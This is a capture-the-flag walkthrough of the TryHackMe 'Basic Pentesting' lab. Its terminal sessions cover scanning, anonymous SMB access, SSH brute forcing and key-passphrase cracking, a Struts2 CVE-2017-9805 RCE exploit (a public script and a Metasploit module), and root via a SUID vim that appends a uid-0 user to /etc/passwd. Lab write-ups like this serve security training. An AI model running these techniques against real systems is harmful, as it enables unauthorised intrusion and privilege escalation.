Link: https://tryhackme.com/room/basicpentestingjt

Author: https://tryhackme.com/p/ashu


Let’s do an NMAP scan against the host with safe scripts and version fingerprinting of services running on the machine.

┌──(root💀b0x)-[~/THM/Basic Pentesting]                                                                  
└─# nmap -sC -sV -v -Pn -n                                                                  
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-11 03:47 PKT     
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.                   
Initiating NSE at 03:47                     
Completed NSE at 03:47, 0.00s elapsed
Scanning [1000 ports]                                                                      
Discovered open port 22/tcp on                                                             
Discovered open port 445/tcp on
Discovered open port 139/tcp on   
Discovered open port 80/tcp on
PORT    STATE SERVICE     VERSION                                                                        
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
|   256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_  256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site does not have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m35s, median: 0s
| nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   BASIC2<00>           Flags: <unique><active>
|   BASIC2<03>           Flags: <unique><active>
|   BASIC2<20>           Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: basic2
|   NetBIOS computer name: BASIC2\x00
|   Domain name: \x00
|   FQDN: basic2
|_  System time: 2021-04-10T18:48:12-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-04-10T22:48:11
|_  start_date: N/A

NSE: Script Post-scanning.
Initiating NSE at 03:48
Completed NSE at 03:48, 0.00s elapsed
Initiating NSE at 03:48
Completed NSE at 03:48, 0.00s elapsed
Initiating NSE at 03:48
Completed NSE at 03:48, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.03 seconds
           Raw packets sent: 1207 (53.108KB) | Rcvd: 1001 (40.056KB)

Alright, four ports open right off the bat, let’s start with enumeration of the web server first!

Port 80 (HTTP)

Before running any active scan scripts against the host, let’s visit the host 😁

Not much really. Let’s proceed with gobuster after checking /robots.txt as a norm!

Alright, robots.txt doesn’t exist, let’s continue with gobuster, I’ll be using big.txt list from dirb for the directory enumeration.

┌──(root💀b0x)-[~/THM/Basic Pentesting]
└─# gobuster dir -u -w /usr/share/wordlists/dirb/big.txt -k -e -b 404 -t 100                                                                                                            130 ⨯
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Expanded:                true
[+] Timeout:                 10s
2021/04/11 03:51:25 Starting gobuster in directory enumeration mode
===============================================================            (Status: 403) [Size: 297]            (Status: 403) [Size: 297]          (Status: 301) [Size: 320] [-->]        (Status: 403) [Size: 301]                                        
2021/04/11 03:52:28 Finished

Alright, there’s a valid endpoint /development let’s check it out. indicates two .txt files in it.


Let’s go through the contents of these:

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm 
using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J

For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.


Alright, we get an image of a server that is insecure and the user hash being cracked easily. Also, there are two users (-K and -J), need their full names or at least usernames.

For now, let’s move back to the open ports & running services found and enumerate them further.

Port 445 - SMB

SMB server running on a linux machine? Let’s run enum4linux — The argument (-a) is for enumerating everything!

┌──(root💀b0x)-[~/THM/Basic Pentesting]                                                                  
└─# enum4linux -a                                                                          
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Apr 11 03:54:51 2021                                                                                                    
|    Target Information    |                                                                             
Target ...........                                                                         
RID Range ........ 500-550,1000-1050                                                                     
Username ......... ''                                                                                    
Password ......... ''                                                                                    
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none                          
|    Enumerating Workgroup/Domain on    |                
[+] Got domain/workgroup name: WORKGROUP

|    Nbtstat Information for    |
Looking up status of
        BASIC2          <00> -         B <ACTIVE>  Workstation Service
        BASIC2          <03> -         B <ACTIVE>  Messenger Service
        BASIC2          <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

|    Session Check on    |
[+] Server allows sessions using username '', password ''

|    Getting domain SID for    |
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 |    OS information on    |
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for from smbclient: 
[+] Got OS info for from srvinfo:
        BASIC2         Wk Sv PrQ Unx NT SNT Samba Server 4.3.11-Ubuntu
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03

|    Users on    |
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

|    Share Enumeration on    |

        Sharename       Type      Comment
        ---------       ----      -------
        Anonymous       Disk      
        IPC$            IPC       IPC Service (Samba Server 4.3.11-Ubuntu)
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on
//       Mapping: OK, Listing: OK
//$    [E] Can't understand response:

|    Password Policy Information for    |

[+] Attaching to using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

        [+] BASIC2
        [+] Builtin

[+] Password Info for Domain: BASIC2

        [+] Minimum password length: 5
        [+] Password history length: None
        [+] Maximum password age: 37 days 6 hours 21 minutes 
        [+] Password Complexity Flags: 000000

                [+] Domain Refuse Password Change: 0 
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0

        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes 
        [+] Locked Account Duration: 30 minutes 
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: 37 days 6 hours 21 minutes

The output is really long so I’ve snipped it, what we need is the Share Enumeration on part.

We can see that there’s an Anonymous share opened on the machine that is accessible without any credentials. Let’s try accessing it! We can use smbclient for doing so.

smbclient //

We can press ENTER on password prompt since it’s an anonymous share!


We can see that there’s a file in the server, let’s download it by using get

smb: \> get staff.txt
getting file \staff.txt of size 173 as staff.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)

Let’s go through it’s contents:

┌──(root💀b0x)-[~/THM/Basic Pentesting]
└─# cat staff.txt 
Announcement to staff:

PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)


We get both the usernames from this file (i.e. Jan & Kay).

Note: Going through the full output of enum4linux, it also enumerated both names of both the users!

Initial User

Since, we’ve the users enumerated, let’s utilize hydra to bruteforce SSH credentials! (I know it’s painful! 😩)


Ah well, after some time, we got the valid credentials. Checked into rockyou.txt and the word was at 780, why would the machine author do this to innocent souls!? 😿

┌──(root💀b0x)-[~/THM/Basic Pentesting]
└─# grep armando /usr/share/wordlists/rockyou.txt -n                                                                                                                                                         130 

Got SSH access! sudo -l ain’t allowed for our user.

┌──(root💀b0x)-[~/THM/Basic Pentesting]                                                                                                                                                                            
└─# ssh jan@                                                                                                                                                                                          
The authenticity of host ' (' can't be established.                                                                                                                                     
ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '' (ECDSA) to the list of known hosts.
jan@'s password: 
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Mon Apr 23 15:55:45 2018 from
jan@basic2:~$ ls -al 
total 12
drwxr-xr-x 2 root root 4096 Apr 23  2018 .
drwxr-xr-x 4 root root 4096 Apr 19  2018 ..
-rw------- 1 root jan    47 Apr 23  2018 .lesshst
jan@basic2:~$ sudo -l 
[sudo] password for jan: 
Sorry, try again.
[sudo] password for jan: 
Sorry, user jan may not run sudo on basic2.

Privileges Escalation

Let’s continue with the local enumeration. Since, we know there’s another user Key in the machine. Let’s check it’s directory and it’s contents.

jan@basic2:/home/kay$ ls -al 
total 48
drwxr-xr-x 5 kay  kay  4096 Apr 23  2018 .
drwxr-xr-x 4 root root 4096 Apr 19  2018 ..
-rw------- 1 kay  kay   756 Apr 23  2018 .bash_history
-rw-r--r-- 1 kay  kay   220 Apr 17  2018 .bash_logout
-rw-r--r-- 1 kay  kay  3771 Apr 17  2018 .bashrc
drwx------ 2 kay  kay  4096 Apr 17  2018 .cache
-rw------- 1 root kay   119 Apr 23  2018 .lesshst
drwxrwxr-x 2 kay  kay  4096 Apr 23  2018 .nano
-rw------- 1 kay  kay    57 Apr 23  2018 pass.bak
-rw-r--r-- 1 kay  kay   655 Apr 17  2018 .profile
drwxr-xr-x 2 kay  kay  4096 Apr 23  2018 .ssh
-rw-r--r-- 1 kay  kay     0 Apr 17  2018 .sudo_as_admin_successful
-rw------- 1 root kay   538 Apr 23  2018 .viminfo
jan@basic2:/home/kay$ find .ssh/ -ls
   798691      4 drwxr-xr-x   2 kay      kay          4096 Apr 23  2018 .ssh/
   798921      4 -rw-rw-r--   1 kay      kay           771 Apr 23  2018 .ssh/authorized_keys
   798917      4 -rw-r--r--   1 kay      kay          3326 Apr 19  2018 .ssh/id_rsa
   798918      4 -rw-r--r--   1 kay      kay           771 Apr 19  2018 .ssh/id_rsa.pub

Oh wow! Can’t read pass.bak but private SSH key file is readable by our user! Let’s utilize this for SSH against Kay!

jan@basic2:/home/kay$ ssh -i .ssh/id_rsa key@localhost
Could not create directory '/home/jan/.ssh'.
The authenticity of host 'localhost (::1)' can't be established.
ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/jan/.ssh/known_hosts).
key@localhost's password:

Ah well, the key is encrypted as well. We can identify that by either SSHing (and seeing the passwordsometimes if the key is wrong, it still asks for password) or checking the header (first 2-3 lines) of id_rsa file.

Download the file id_rsa locally and convert it to john's readable format for cracking using ssh2john.

┌──(root💀b0x)-[~/THM/Basic Pentesting]
└─# curl https://raw.githubusercontent.com/openwall/john/bleeding-jumbo/run/ssh2john.py -O                                                                                                                   130 ⨯
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  8696  100  8696    0     0   9949      0 --:--:-- --:--:-- --:--:--  9938

┌──(root💀b0x)-[~/THM/Basic Pentesting]
└─# python3 ssh2john.py id_rsa > id_rsa.hash
┌──(root💀b0x)-[~/THM/Basic Pentesting]
└─# cat id_rsa.hash 

Let’s get cracking!

Cracked successfully and fast this time! 😁

┌──(root💀b0x)-[~/THM/Basic Pentesting]
└─# john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt                                                                                                                                               1 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax          (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:03 DONE (2021-04-11 04:26) 0.2710g/s 3886Kp/s 3886Kc/s 3886KC/sa6_123..*7¡Vamos!
Session completed

Let’s SSH into the machine utilizing the id_rsa and password cracked now!


Remember, we can’t still do sudo -l since that requires user password while we only have the key’s password.

I did that try the cracked key password though, but it didn’t work!

See that pass.bak file there? 😏 Let’s check it’s contents.

kay@basic2:~$ cat pass.bak

Root User!

Used the password and we can run any binary as any user with sudo.

kay@basic2:~$ sudo -l 
[sudo] password for kay: 
Matching Defaults entries for kay on basic2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User kay may run the following commands on basic2:
    (ALL : ALL) ALL

Aaaand, we’re root!


root@basic2:~# cat flag.txt
Congratulations! You've completed this challenge. There are two ways (that I'm aware of) to gain 
a shell, and two ways to privesc. I encourage you to find them all!

If you're in the target audience (newcomers to pentesting), I hope you learned something. A few
takeaways from this challenge should be that every little bit of information you can find can be
valuable, but sometimes you'll need to find several different pieces of information and combine
them to make them useful. Enumeration is key! Also, sometimes it's not as easy as just finding
an obviously outdated, vulnerable service right away with a port scan (unlike the first entry
in this series). Usually you'll have to dig deeper to find things that aren't as obvious, and
therefore might've been overlooked by administrators.

Thanks for taking the time to solve this VM. If you choose to create a writeup, I hope you'll send 
me a link! I can be reached at josiah@vt.edu. If you've got questions or feedback, please reach
out to me.

Happy hacking!

That was easy and definitely a basic pentesting machine! Hopefully you enjoyed reading till the end (that is if you did 😄)

Alternate method to PrivEsc!

The flag mentions there’s an alternate method to privesc too! Let’s find that out.

Let’s run linpeas and note all the actionable things!

  • The kernel version looks really old.
════════════════════════════════════╣ Basic information ╠════════════════════════════════════                                                                                                                      
OS: Linux version 4.4.0-119-generic (buildd@lcy01-amd64-013) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #143-Ubuntu SMP Mon Apr 2 16:08:24 UTC 2018
  • Services listening on port 8005 locally (remember the server we saw in the initial .txts maybe?)
  • Also, port 8080 and 8009 listening from everywhere! Nmap (-sC and -sV) missed this — Always full port scan first! 😛
[+] Active Ports
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp        0      0    *               LISTEN      -               
tcp        0      0   *               LISTEN      -               
tcp        0      0   *               LISTEN      -               
tcp6       0      0 :::22                   :::*                    LISTEN      -               
tcp6       0      0 :::445                  :::*                    LISTEN      -               
tcp6       0      0          :::*                    LISTEN      -               
tcp6       0      0 :::8009                 :::*                    LISTEN      -               
tcp6       0      0 :::139                  :::*                    LISTEN      -               
tcp6       0      0 :::8080                 :::*                    LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -
  • Haven’t seen this before, but maybe the SMB service’s secrets file (only readable/writeable by root)
[+] Searching AD cached hashes
-rw------- 1 root root 430080 Apr 19  2018 /var/lib/samba/private/secrets.tdb
  • Highlighted SUID and ntfs-3g (I remember some exploits on them)
════════════════════════════════════╣ Interesting Files ╠════════════════════════════════════                                                                                                                      
[+] SUID - Check easy privesc, exploits and write perms                                                                                                                                                            
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid                                                                                                                                      
strings Not Found                                                                                        
-rwsr-xr-x 1 root   root        44K May  7  2014 /bin/ping6                                                                                                                                                        
-rwsr-xr-x 1 root   root        44K May  7  2014 /bin/ping                                                                                                                                                         
-rwsr-sr-x 1 daemon daemon      51K Jan 14  2016 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)                                                                                                                
-rwsr-xr-x 1 root   root        15K Jan 17  2016 /usr/lib/policykit-1/polkit-agent-helper-1                                                                                                                        
-rwsr-xr-x 1 root   root        23K Jan 17  2016 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)                                                                                  
-rwsr-xr-x 1 root   root        31K Jul 12  2016 /bin/fusermount                                                                                                                                                   
-rwsr-xr-x 1 root   root       2.4M Nov 24  2016 /usr/bin/vim.basic                                                                                                                                                
-rwsr-xr-- 1 root   messagebus  42K Jan 12  2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper                                                                                                                       
-rwsr-xr-x 1 root   root       139K Jan 28  2017 /bin/ntfs-3g  --->  Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others(02-2017)                                                                      
-rwsr-xr-x 1 root   root        10K Mar 27  2017 /usr/lib/eject/dmcrypt-get-device                                                                                                                                 
-rwsr-xr-x 1 root   root        40K May 16  2017 /usr/bin/chsh                                                                                                                                                     
-rwsr-xr-x 1 root   root        53K May 16  2017 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)                                                    
-rwsr-xr-x 1 root   root        74K May 16  2017 /usr/bin/gpasswd                                                                                                                                                  
-rwsr-xr-x 1 root   root        49K May 16  2017 /usr/bin/chfn  --->  SuSE_9.3/10                        
-rwsr-xr-x 1 root   root        39K May 16  2017 /usr/bin/newgrp  --->  HP-UX_10.20                                                                                                                                
-rwsr-xr-x 1 root   root        40K May 16  2017 /bin/su                                                                                                                                                           
-rwsr-xr-x 1 root   root        33K May 16  2017 /usr/bin/newuidmap                                                                                                                                                
-rwsr-xr-x 1 root   root        33K May 16  2017 /usr/bin/newgidmap                                                                                                                                                
-rwsr-xr-x 1 root   root        39K Jun 14  2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic                                                                                                                        
-rwsr-xr-x 1 root   root       134K Jul  4  2017 /usr/bin/sudo  --->  /sudo$                                                                                                                                       
-rwsr-sr-x 1 root   root        84K Nov 30  2017 /usr/lib/snapd/snap-confine                                                                                                                                       
-rwsr-xr-x 1 root   root        27K Nov 30  2017 /bin/umount  --->  BSD/Linux(08-1996)                                                                                                                             
-rwsr-xr-x 1 root   root        40K Nov 30  2017 /bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8                                                                                   
-rwsr-xr-x 1 root   root       419K Jan 18  2018 /usr/lib/openssh/ssh-keysign

Port 8080 - HTTP

Alright, we found Apache Tomcat server running on the server. The credentials also need to be bruteforced to access. But again, let’s refer to the file dev.txt

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm 
using version 2.5.12, because other versions were giving me trouble. -K

So, two things, first struts (many exploits of apache struts) and other thing mentioned is REST API.

Let’s search for exploits:


Alright, this exploit seems like the one! linux/remote/42627.py

Running the exploit and wasn’t successful since we don’t have the right path to the REST API. Tried custom ones, didn’t work. Googled the exploitation of this vulnerability and found out this cool article ( Detecting and Exploiting the Java Struts2 REST Plugin vulnerability — CVE-2017–9805 )

He deployed the custom version (from dev.txt), we also have the custom version! Let’s try it!

The path becomes:


Worked fine and we got redirected, let’s pass this to the exploit!

┌──(root💀b0x)-[~/THM/Basic Pentesting]
└─# python3 42627.py                                                            
CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE
[*] Warflop - http://securityattack.com.br
[*] Greatz: Pimps & G4mbl3r
[*] Use: python struts2.py URL COMMAND
[*] Example: python struts2.py http://sitevulnerable.com/struts2-rest-showcase/orders/3 id

The argument becomes:

┌──(root💀b0x)-[~/THM/Basic Pentesting]
└─# python3 42627.py id           
<!doctype html><html lang="en"><head><title>HTTP Status 500  Internal Server Error</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 
{font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,A
rial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12
px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 500  Internal Server Error</h1><hr class="line" /><p><b>Type</b> Exceptio
n Report</p><p><b>Message</b> java.lang.String cannot be cast to java.security.Provider$Service : java.lang.String cannot be cast to java.security.Provider$Service</p><p><b>Description</b> The server encountered
 an unexpected condition that prevented it from fulfilling the request.</p><p><b>Exception</b></p><pre>com.thoughtworks.xstream.converters.ConversionException: java.lang.String cannot be cast to java.security.Pr
ovider$Service : java.lang.String cannot be cast to java.security.Provider$Service                    
---- Debugging information ----                                                                                                                                                                                    
message             : java.lang.String cannot be cast to java.security.Provider$Service         
cause-exception     : java.lang.ClassCastException                                                                                                                                                                 
cause-message       : java.lang.String cannot be cast to java.security.Provider$Service                                                                                                                            
class               : java.util.HashMap                                                                  
required-type       : java.util.HashMap                                                                  
converter-type      : com.thoughtworks.xstream.converters.collections.MapConverter                                                                                                                                 
path                : &#47;map&#47;entry                                                                 
line number         : 49                                                                                 
version             : 1.4.8                                                                                                                                                                                        

Alright, errors 😅 — Let’s try good ol' metasploit maybe? Because it also contains a exploit for this.

msf6 > search struts

Matching Modules

   #   Name                                                     Disclosure Date  Rank       Check  Description
   -   ----                                                     ---------------  ----       -----  -----------
   0   exploit/multi/http/struts2_code_exec_showcase            2017-07-07       excellent  Yes    Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution
   1   exploit/multi/http/struts2_content_type_ognl             2017-03-07       excellent  Yes    Apache Struts Jakarta Multipart Parser OGNL Injection
   2   exploit/multi/http/struts2_multi_eval_ognl               2020-09-14       excellent  Yes    Apache Struts 2 Forced Multi OGNL Evaluation
   3   exploit/multi/http/struts2_namespace_ognl                2018-08-22       excellent  Yes    Apache Struts 2 Namespace Redirect OGNL Injection
   4   exploit/multi/http/struts2_rest_xstream                  2017-09-05       excellent  Yes    Apache Struts 2 REST Plugin XStream RCE
   5   exploit/multi/http/struts_code_exec                      2010-07-13       good       No     Apache Struts Remote Command Execution
   6   exploit/multi/http/struts_code_exec_classloader          2014-03-06       manual     No     Apache Struts ClassLoader Manipulation Remote Code Execution
   7   exploit/multi/http/struts_code_exec_exception_delegator  2012-01-06       excellent  No     Apache Struts Remote Command Execution
   8   exploit/multi/http/struts_code_exec_parameters           2011-10-01       excellent  Yes    Apache Struts ParametersInterceptor Remote Code Execution
   9   exploit/multi/http/struts_default_action_mapper          2013-07-02       excellent  Yes    Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
   10  exploit/multi/http/struts_dev_mode                       2012-01-06       excellent  Yes    Apache Struts 2 Developer Mode OGNL Execution
   11  exploit/multi/http/struts_dmi_exec                       2016-04-27       excellent  Yes    Apache Struts Dynamic Method Invocation Remote Code Execution
   12  exploit/multi/http/struts_dmi_rest_exec                  2016-06-01       excellent  Yes    Apache Struts REST Plugin With Dynamic Method Invocation Remote Code Execution
   13  exploit/multi/http/struts_include_params                 2013-05-24       great      Yes    Apache Struts includeParams Remote Code Execution

We can use exploit/multi/http/struts2_rest_xstream


Yosh, RCE! 🤤

Now let’s get to privesc after getting an interactive shell (will leave this upto you to figure out)

Let’s run linpeas.sh and see what we can use to privesc now! — Skipping results

Ran SUID3NUM against the machine and found out an interesting binary (which we missed in linpeas, results hahaha :feels-embarrased-man xD)


We can add the following one liner in /etc/passwd end and get our user new user pentest with password pentest123 with uid and gid 0 → root

Let’s generate password compatible for /etc/passwd

tomcat9@basic2:/$ openssl passwd -1 -salt pentest pentest123

Let’s add the following in the end of /etc/passwd


Format is:



I’ll leave it to to you to figure out how to exim vim! 😛

Aaaand, we’re root yet again! XD


Things learnt:

  • Be patient while bruteforcing (if it’s SSH or any other slow protocol)
  • Remember to enumerate every port and try all relevant enumeration scripts!
  • Check all open ports! 😐